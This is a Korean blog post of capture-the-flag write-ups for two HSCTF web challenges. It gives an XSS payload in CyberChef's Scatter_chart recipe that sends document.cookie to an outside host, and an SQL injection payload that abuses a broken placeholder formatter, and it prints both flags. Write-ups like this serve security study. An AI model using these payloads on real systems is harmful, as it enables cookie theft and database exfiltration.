Cyberchef

๋ฌธ์ œ ํŽ˜์ด์ง€๋Š” ์œ„์™€ ๊ฐ™๋‹ค. 

 

< app.js >

const express = require('express');
const bodyParser = require('body-parser');
const { checkRateLimit, checkUrl, visitUrl } = require('./utils');

const app = express();

app.set('view engine', 'ejs');

app.use(bodyParser.urlencoded({
  extended: false
}));

app.get('/', (req, res) => {
  res.render('index');
});

app.post('/report', (req, res) => {
  const url = req.body.url;

  if (!checkUrl(url)) {
    res.redirect('/?message=invalid argument');
  } else if (!checkRateLimit(req.ip)) {
    res.redirect(`/?message=rate limited`);
  } else {
    visitUrl(url)
      .then(() => res.redirect('/?message=reported'));
  }
});

app.listen(8001);

< utils.js >

const webdriver = require('selenium-webdriver');
const capabilities = webdriver.Capabilities.chrome();

const flag = require('fs').readFileSync('/flag').toString().trim();

const rateLimit = 30 * 1000;
const pageTimeout = 3 * 1000;
const urlPrefix = 'http://cyberchef:8000/';

const timestamps = new Map();

const sleep = (ms) => {
  return new Promise((resolve) => {
    setTimeout(() => resolve(), ms);
  });
};

const checkRateLimit = (key) => {
  const now = Date.now();

  if (timestamps.has(key) && timestamps.get(key) > now - rateLimit) {
    return false;
  }

  timestamps.set(key, now);
  return true;
};

const checkUrl = (url) => {
  return !(typeof url !== 'string' || !url.startsWith(urlPrefix) || url.length > 1024);
};

const visitUrl = (url) => {
  return new Promise(async (resolve) => {
    const driver = new webdriver.Builder('chrome')
      .usingServer('http://selenium:4444/wd/hub/')
      .withCapabilities(capabilities)
      .build();

    await driver.get(urlPrefix);

    await driver.manage().addCookie({
      name: 'flag',
      value: flag
    });

    await driver.manage().setTimeouts({
      implicit: pageTimeout,
      pageLoad: pageTimeout,
      script: pageTimeout
    });

    await driver.get(url);
    await sleep(pageTimeout);
    await driver.quit();

    resolve();
  });
};

module.exports = {
  checkRateLimit,
  checkUrl,
  visitUrl
};

ํ•ต์‹ฌ ์ฝ”๋“œ๋Š” ์œ„์™€ ๊ฐ™๋‹ค. utils.js ํŒŒ์ผ์—์„œ chromedriver๋กœ ์ ‘์†ํ•˜๊ณ ์ž ํ•˜๋Š” ์›น์‚ฌ์ดํŠธ์— ์ ‘๊ทผํ•˜๋ฉฐ Cookie๋ฅผ ํƒˆ์ทจํ•ด์•ผ Flag๋ฅผ ์–ป์„ ์ˆ˜ ์žˆ๋‹ค.  ๋ฌธ์ œ ํŽ˜์ด์ง€ ์ตœ์ƒ๋‹จ ์ขŒ์ธก์— Download CyberChef๋ฅผ ํด๋ฆญํ•ด ์†Œ์Šค์ฝ”๋“œ๋ฅผ ๋ณด๋ฉด CyberChef_v9.32.3 ๋ฒ„์ „์„ ์‚ฌ์šฉํ•œ๋‹ค. github์— cyberchef์™€ ๊ด€๋ จ๋œ issues๋ฅผ ๋ณด๋ฉด XSS์™€ ๊ด€๋ จ๋œ ์ทจ์•ฝ์ ๋“ค์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ์—ˆ๋‹ค.

์œ„  recipe=Scatter_chart('Line%20feed','Space',false,'','','red%22%3E%3Cscript%3Ealert(%22XSS:%20%22%20%2B%20document.domain)%3C/script%3E',100,false)&input=MTAwLCAxMDA

ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ง์ ‘ ๋Œ€์ž…ํ•˜๋ฉด XSS๊ฐ€ ํ„ฐ์ง€๋Š” ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.

 

์œ„ URL์„ Reportํ•˜์—ฌ Flag๋ฅผ ์–ป์œผ๋ฉด ๋œ๋‹ค.

 

Payload

http://cyberchef:8000/#recipe=Scatter_chart('Line%20feed','Space',false,'','','red%22%3E%3Cscript%3Elocation.href%3d%22https://payload.site/?%22%2Bdocument.cookie%3C/script%3E',100,false)&input=MTAwLCAxMDA

Flag

hsctf{fa98fe3d32b4302aff1c322c925238a9d935b636f265cbfdd798391ca9c5a905}

Not E

Main Page
Login Page

์†Œ์Šค ์ฝ”๋“œ๋ฅผ ๋ดค๋”๋‹ˆ SQL Query๋ฌธ์ด ๋งŽ์ด ๋ณด์ด๋Š” ๊ฒƒ์„ ๋ณด์•„ SQL Injection์„ ์˜์‹ฌํ–ˆ๋‹ค. ๋งˆ์นจ SQLi ๋ฌธ์ œ๋ฅผ ์œ„ํ•œ ๋นŒ๋“œ์—…์ฒ˜๋Ÿผ ๋ณด์ด๊ธฐ๋„ ํ–ˆ๊ณ . 

flag table์— flag๊ฐ€ ์ €์žฅ๋˜์–ด ์žˆ๋Š” ๊ฒƒ์„ ํ™•์ธํ•˜๊ณ  SQLi exploit ๋ฌธ์ œ์ธ ๊ฒƒ์„ ํ™•์ •.

 

app.all('/new', async (req, res) => {
  if (req.method !== 'POST') {
    return res.render('new', { auth: true });
  }

  const { title, content } = req.body;
  // console.log("title : ", title, "content : ", content);
  // console.log('title type', typeof(title), 'content type', typeof(content));
  if (!checkParam(title) || !checkParam(content)) {
    return res.redirect('?message=invalid argument');
  }

  const noteId = md5(title + content);
  //insert into posts values (?, ?, select)
  await db.run('insert into posts values (?, ?, ?, ?)', [ noteId, title, content, req.session.login ]);

  return res.redirect('/?message=successfully created');
});

/new endpoint์—์„œ ์ตœํ•˜๋‹จ insert์ฟผ๋ฆฌ๋ฌธ์„ ๋ณด๋ฉด prepared statement๋ฅผ "?"๋กœ ๋ฐ›๋Š”๋‹ค. ๋„์ปค๋กœ ๊ฐ™์€ ํ™˜๊ฒฝ์—์„œ ํ…Œ์ŠคํŠธ๋ฅผ ํ•ด๋ดค๋”๋‹ˆ "?" ๋ฌธ์ž๊ฐ€ formatQuery๋กœ ์ธํ•ด ํ•˜๋‚˜ ๋” ์ถ”๊ฐ€๋˜๊ณ  sql.replace('?', param)์— ์˜ํ•ด ๋นˆ ๋ฌธ์ž์—ด์ธ ""๋กœ ๋Œ€์ฒด๋˜๋Š” ๊ฒƒ์„ ํ™•์ธํ•˜์˜€๋‹ค.

 

์ฐธ๊ณ  ์ž๋ฃŒ : https://jangjongmin.oopy.io/b32e4eba-7b35-4540-97bb-be242f16c5f8

 

์˜ˆ์‹œ)

Input : Insert INTO posts ("test", "1234?", "5678", "guest");
Output : Insert INTO posts ("test", "1234""", "5678", "guest");

์ด๋ ‡๊ฒŒ ?๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด "ํ•„ํ„ฐ๋ง ์šฐํšŒ๊ฐ€ ๊ฐ€๋Šฅํ•˜๋ฏ€๋กœ SQLi๊ฐ€ ๊ฐ€๋Šฅํ•˜๋‹ค.

 

Payload

title : exploit
content : ,(SELECT * FROM flag), 'username');-- 

# Input : INSERT INTO posts VALUES ("note_id", "exploit", ", (SELECT * FROM flag), 'username'); -- ", "username");
# Output : INSERT INTO posts VALUES ("note_id", "exploit", (SELECT * FROM flag), 'username');-- "", "", ?);

Flag

hsctf{038d083216a920c589917b898ff41fd9611956b711035b30766ffaf2ae7f75f2}

 

์ €์ž‘์žํ‘œ์‹œ ๋น„์˜๋ฆฌ ๋ณ€๊ฒฝ๊ธˆ์ง€ (์ƒˆ์ฐฝ์—ด๋ฆผ)

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”